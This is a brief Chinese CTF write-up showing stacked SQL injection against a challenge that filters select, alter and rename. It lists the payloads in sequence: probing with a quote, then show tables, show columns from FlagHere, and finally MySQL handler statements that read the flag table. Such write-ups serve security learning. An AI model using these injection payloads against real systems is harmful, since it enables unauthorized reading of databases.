测试:1
测试:1’ //有报错
测试发现union select语句可以回显出waf
利用堆叠注入查表1’;show tables;–+ // ; 结束上一条sql语句,再继续构造下一条语句。堆叠注入的局限性在于并不是每一个环境下都可以执行,可能受到API或者数据库引擎不支持的限制。
查字段1’;show columns from FlagHere;–+
1’;handler FlagHere open; handler FlagHere read first; // 题目过滤了alter,rename,select。使用handler代替select进行查询。
参考:
堆叠注入:https://www.cnblogs.com/0nth3way/articles/7128189.html
Handler:https://dev.mysql.com/doc/refman/5.7/en/handler.html